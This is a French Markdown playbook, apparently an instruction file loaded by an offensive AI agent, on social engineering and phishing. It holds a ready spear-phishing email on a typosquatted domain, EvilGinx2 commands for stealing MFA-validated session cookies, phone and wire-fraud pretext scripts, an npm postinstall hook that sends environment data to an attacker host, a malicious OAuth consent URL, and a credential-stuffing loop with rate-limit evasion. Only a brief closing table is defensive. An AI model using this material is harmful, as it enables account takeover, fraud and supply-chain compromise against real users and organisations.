# atk-exploit-social.md
> Techniques de social engineering et phishing technique.
> The Mask charge ce fichier quand : supply chain humaine, phishing, accès initial via humain.

---

## 1. Spear Phishing

**Préparation (OSINT) :**
```
1. LinkedIn → identifier la cible, son manager, ses projets actuels
2. Hunter.io / emails trouvés → format email company (prenom.nom@company.com)
3. Glassdoor → stack technique, outils internes utilisés
4. GitHub → repos publics de l'entreprise → noms d'outils, conventions
```

**Email spear phishing crédible :**
```
From: sarah.johnson@company-corp.com  ← domaine typosquatté (company-corp vs company)
Subject: [Action requise] Mise à jour sécurité VPN — avant vendredi

Bonjour [Prénom],

Suite à l'audit de sécurité de la semaine dernière, l'équipe IT demande
à tous les employés de réinitialiser leurs credentials VPN.

→ Accédez au portail de mise à jour : https://vpn.company-corp.com/reset

[Bouton : Mettre à jour maintenant]

IT Security Team
```

**Payload de la page de phishing :**
- Clone exact du portail VPN (HTTrack)
- Credentials captés → redirigés vers la vraie page (évite les soupçons)
- Optionnel : EvilGinx2 pour capturer la session complète (MFA bypass)

---

## 2. Clone Phishing + MFA Bypass (EvilGinx)

**Principe :** EvilGinx2 agit comme proxy entre la cible et le vrai site.
La cible entre ses credentials ET valide le MFA → EvilGinx capture la session cookie.

```bash
# Configuration EvilGinx2
phishlets hostname o365 login.microsoftonline.attacker.com
phishlets enable o365
lures create o365
lures get-url 0
# → URL de phishing avec tracking

# Après que la cible s'authentifie :
sessions list
sessions get 1
# → Cookie de session valide, MFA déjà validé
```

**Impact :** Bypass MFA complet → accès O365/Google Workspace/VPN.

---

## 3. Pretexting

**Scénario IT Support :**
```
Appel téléphonique :
"Bonjour, je suis Marc de l'équipe sécurité. Nous avons détecté une connexion
suspecte depuis [ville] sur votre compte. Pour sécuriser votre accès, j'ai besoin
de vérifier votre identité avec votre code d'authentification actuel."
→ Cible lit le code OTP → accès compromis
```

**Scénario Vendor/Fournisseur :**
```
Email :
"Je suis le nouveau responsable commercial chez [votre fournisseur de paiement].
Nous migrons notre système bancaire — pouvez-vous confirmer votre RIB actuel
et le mettre à jour vers notre nouveau numéro de compte ?"
→ Fraude au virement (BEC — Business Email Compromise)
```

---

## 4. Supply Chain Social — Typosquatting + Dependency Confusion

**Typosquatting npm :**
```bash
# Packages légitimes vs squattés
lodash    → l0dash, 1odash, lodahs
react     → reaact, reacts, react-dom-utils
axios     → axois, axioss, axio

# Publication du package malveillant avec postinstall :
{
  "scripts": {
    "postinstall": "node -e \"require('https').get('https://c2.attacker.com/b?e='+process.env.npm_config_registry+'&p='+process.env.PATH);\""
  }
}
```

**Dependency Confusion :**
```
Si une entreprise utilise un package interne (@company/internal-lib)
→ Publier un package public du même nom avec une version supérieure
→ npm préfère la version publique plus récente si le registre n'est pas configuré
```

---

## 5. OAuth Consent Phishing

**Principe :** Créer une app OAuth malveillante qui demande des permissions larges.
L'utilisateur clique "Authoriser" en pensant que c'est légitime.

```
App malveillante enregistrée sur Google :
Nom : "Google Drive Sync Utility"
Permissions demandées :
  - Lire tous les emails (gmail.readonly)
  - Lire tous les fichiers Drive (drive.readonly)
  - Accès contacts (contacts.readonly)

URL de phishing :
https://accounts.google.com/o/oauth2/auth?client_id=ATTACKER_APP_ID
  &scope=gmail.readonly+drive.readonly+contacts.readonly
  &redirect_uri=https://attacker.com/callback
  &response_type=code
```

**Impact :** Token OAuth persistant → accès aux données même après changement de mot de passe.

---

## 6. Credential Stuffing

**Principe :** Utiliser des leaks de bases de données (HaveIBeenPwned, forums darkweb) pour tester des credentials sur d'autres services.

```bash
# Avec Hydra ou un script custom
cat leaked_credentials.txt | while read line; do
  user=$(echo $line | cut -d: -f1)
  pass=$(echo $line | cut -d: -f2)
  curl -s -o /dev/null -w "%{http_code}" \
    -X POST https://target.com/api/login \
    -d "{\"username\":\"$user\",\"password\":\"$pass\"}" \
    -H "Content-Type: application/json"
done

# Contournement rate limiting :
# - Rotation IPs (Tor, proxies résidentiels)
# - User-agent rotation
# - Délais aléatoires entre requêtes
```

**Impact :** Accès à des comptes réutilisant des mots de passe (70%+ des utilisateurs).

---

## Indicateurs (défense)

| Signal | Attaque probable |
|--------|-----------------|
| Domaine enregistré < 30 jours | Phishing setup récent |
| Certificat Let's Encrypt + URL similaire à un service légitime | Clone phishing |
| OAuth app inconnue avec permissions larges | Consent phishing |
| Pics de login failures depuis IPs distribuées | Credential stuffing |
| Email depuis domaine typosquatté | Spear phishing / BEC |
